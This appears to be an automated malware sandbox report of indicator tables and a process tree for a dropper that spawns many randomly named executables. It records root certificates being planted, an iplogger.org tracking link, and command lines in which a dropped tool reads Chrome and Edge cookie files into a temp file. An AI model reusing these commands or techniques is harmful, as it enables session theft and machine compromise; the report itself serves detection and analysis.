Modifies data under HKEY_USERS 43 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | sihclient.exe
-
Modifies registry class 7 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | (no process name captured)
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | (no process name captured)
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | (no process name captured)
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | (no process name captured)
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{EBB086E9-9B02-4D4F-902E-D03FD4258FF5} | Weather.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{CC4DB119-78C5-4B85-8330-08CDB3243364} | Weather.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | (no process name captured)
-
Processes:
description | ioc | process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [blob data not reproduced in this copy] | GameBoxWin64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | Cleaner Installation.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [blob data not reproduced in this copy] | GameBoxWin64.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = [blob data not reproduced in this copy] | Weather Installation.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | GameBoxWin64.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [blob data not reproduced in this copy] | GameBoxWin64.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = [blob data not reproduced in this copy] | Cleaner Installation.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [blob data not reproduced in this copy] | GameBoxWin64.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e5c0000000100000004000000001000002000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | Cleaner Installation.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | Weather Installation.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 120 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 125 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process (consecutive identical entries collapsed, count in parentheses)
1832 | WerFault.exe (x2)
2460 | msedge.exe (x2)
5040 | msedge.exe (x2)
1492 | WerFault.exe (x2)
4608 | identity_helper.exe (x2)
3980 | Installation.exe (x28)
6108 | bEYG8MCmwS_N0mgL9uYFs3Jb.exe (x2)
6092 | WerFault.exe (x2)
508 | WerFault.exe (x2)
3192 | (no process name captured) (x2)
5272 | WerFault.exe (x2)
3192 | (no process name captured) (x16)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3192 | (no process name captured)
-
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
pid | process (consecutive identical entries collapsed, count in parentheses)
6108 | bEYG8MCmwS_N0mgL9uYFs3Jb.exe
3192 | (no process name captured) (x8)
3280 | explorer.exe (x4)
3192 | (no process name captured) (x2)
3280 | explorer.exe (x4)
3192 | (no process name captured) (x2)
3280 | explorer.exe (x4)
3192 | (no process name captured) (x2)
3280 | explorer.exe (x4)
3192 | (no process name captured) (x2)
3280 | explorer.exe (x2)
3192 | (no process name captured) (x2)
3280 | explorer.exe (x27)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
token | pid | process (consecutive identical entries collapsed, count in parentheses)
SeDebugPrivilege | 4780 | KRSetp.exe
SeRestorePrivilege | 1832 | WerFault.exe
SeBackupPrivilege | 1832 | WerFault.exe (x2)
SeTcbPrivilege | 2476 | svchost.exe (x6)
SeDebugPrivilege | 5236 | OaUqDiJqLrReD6nAIAxVSWA8.exe
SeDebugPrivilege | 5264 | rUNdlL32.eXe
SeShutdownPrivilege / SeCreatePagefilePrivilege (alternating) | 3192 | (no process name captured) (x2 pairs)
SeDebugPrivilege | 2260 | AGV_ZCjRSXUJEYPKIJWOth72.exe
SeShutdownPrivilege / SeCreatePagefilePrivilege (alternating) | 3192 | (no process name captured) (x12 pairs)
SeDebugPrivilege | 5364 | bAGRnF23dqqSQc9GLsP_8f2i.exe
SeDebugPrivilege | 5204 | LvJ59gJxc3LSPWvaIC75WK3C.exe
SeDebugPrivilege | 1400 | 8421129.exe
SeDebugPrivilege | 4636 | i51OEtivp64F1h3jriSb9179.exe
SeShutdownPrivilege / SeCreatePagefilePrivilege (alternating) | 3192 | (no process name captured) (x3 pairs)
SeDebugPrivilege | 1588 | 3544711.exe
SeShutdownPrivilege / SeCreatePagefilePrivilege (alternating) | 3192 | (no process name captured) (x3 pairs)
SeCreateTokenPrivilege | 1884 | askinstall53.exe
SeAssignPrimaryTokenPrivilege | 1884 | askinstall53.exe
SeLockMemoryPrivilege | 1884 | askinstall53.exe
SeIncreaseQuotaPrivilege | 1884 | askinstall53.exe
SeMachineAccountPrivilege | 1884 | askinstall53.exe
SeTcbPrivilege | 1884 | askinstall53.exe
-
Suspicious use of FindShellTrayWindow 15 IoCs
Processes:
pid | process (consecutive identical entries collapsed, count in parentheses)
5040 | msedge.exe
1284 | X6pFteX1hujq71gAoddJIl03.tmp
5692 | Cleaner Installation.exe
3472 | GameBoxWin64.exe
2536 | Weather Installation.exe
5744 | ultramediaburner.tmp
3896 | WerFault.exe
4032 | Weather.exe (x7)
5488 | msedge.exe
-
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
pid | process (consecutive identical entries collapsed, count in parentheses)
4032 | Weather.exe (x5)
-
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
pid | process
3980 | Installation.exe
5276 | 1JXoSiUoBQDRFxKQt6PfAJQT.exe
5288 | S9vvbu_thmJNivbyrd5cbgjY.exe
5300 | 6fb0NKLzbR9O1Hnpb8meEjoY.exe
5316 | bEYG8MCmwS_N0mgL9uYFs3Jb.exe
5328 | MsKeXpA3JCm5KJWAfbFTLe6p.exe
5548 | iHcz2PjFZ8e9IDvRcRQLV9o9.exe
5584 | bFClUtu0XfsHUGnX6uO9BE2D.exe
5556 | KaN6V1t36aPvGbjwrCNT4frv.exe
5340 | ZP8ROxtPgq7xzmkTnY1ILt2W.exe
796 | X6pFteX1hujq71gAoddJIl03.exe
5908 | 22222.exe
1284 | X6pFteX1hujq71gAoddJIl03.tmp
1568 | customer3.exe
5884 | md8_8eus.exe
2708 | 1cu20YjSd19Ml5gGnIdtbCyZ.exe
3180 | 11111.exe
5824 | jfiag3g_gg.exe
5248 | 11111.exe
5744 | ultramediaburner.tmp
5908 | 22222.exe
5480 | Setup.exe
3632 | MediaBurner2.exe
1884 | askinstall53.exe
1604 | Conhost.exe
2240 | MediaBurner2.tmp
5460 | msedge.exe
6112 | 11111.exe
1664 | zhangfei.exe
4856 | zhangfei.exe
5780 | jfiag3g_gg.exe
5908 | 22222.exe
2468 | 22222.exe
972 | svchost.exe
2472 | 22222.exe
6776 | ultramediaburner.exe
5744 | ultramediaburner.tmp
5828 | ufgaa.exe
876 | anyname.exe
7084 | anyname.exe
5628 | 11111.exe
4008 | 804C.exe
6508 | 11111.exe
5628 | 11111.exe
2076 | 11111.exe
5968 | h5Mf7fCP0iLoTpkZt0_ezgBy.exe
6244 | 11111.exe
4628 | 11111.exe
5408 | 11111.exe
7104 | 11111.exe
2460 | 11111.exe
1376 | 11111.exe
4504 | 11111.exe
6332 | 11111.exe
7076 | jfiag3g_gg.exe
1552 | 11111.exe
3500 | 11111.exe
3696 | 11111.exe
6216 | 11111.exe
5136 | 11111.exe
3240 | 11111.exe
6032 | 11111.exe
6088 | 11111.exe
5980 | 11111.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | source pid | source process | target pid | target process (consecutive identical entries collapsed, count in parentheses)
wrote to memory of | 1624 | EB7233922891E1DAD0434FBD52623647.exe | 4780 | KRSetp.exe (x2)
wrote to memory of | 1624 | EB7233922891E1DAD0434FBD52623647.exe | 5040 | msedge.exe (x2)
wrote to memory of | 1624 | EB7233922891E1DAD0434FBD52623647.exe | 4924 | Folder.exe (x3)
wrote to memory of | 5040 | msedge.exe | 3508 | msedge.exe (x2)
wrote to memory of | 4924 | Folder.exe | 4992 | Folder.exe (x3)
wrote to memory of | 1624 | EB7233922891E1DAD0434FBD52623647.exe | 4504 | Info.exe (x3)
wrote to memory of | 1008 | rUNdlL32.eXe | 1096 | rundll32.exe (x3)
wrote to memory of | 1432 | WerFault.exe | 1096 | rundll32.exe (x2)
wrote to memory of | 5040 | msedge.exe | 2368 | msedge.exe (x40)
wrote to memory of | 5040 | msedge.exe | 2460 | msedge.exe (x2)
wrote to memory of | 5040 | msedge.exe | 3924 | msedge.exe (x2)
Processes
- "C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"
  - Suspicious use of WriteProcessMemory
    - "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw7
      - Adds Run key to start application
      - Enumerates system info in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
          - Suspicious behavior: EnumeratesProcesses
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
        - "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:8
        - "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:8
          - Suspicious behavior: EnumeratesProcesses
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1828 /prefetch:1
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
        - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5112 /prefetch:2
    - "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
        - "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a
          - Executes dropped EXE
    - "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"
      - Executes dropped EXE
        - C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 240
          - Program crash
          - Checks processor information in registry
          - Enumerates system info in registry
          - Suspicious behavior: EnumeratesProcesses
    - "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
        - "C:\Users\Admin\Documents\6fb0NKLzbR9O1Hnpb8meEjoY.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Executes dropped EXE
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Executes dropped EXE
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Suspicious use of SetWindowsHookEx
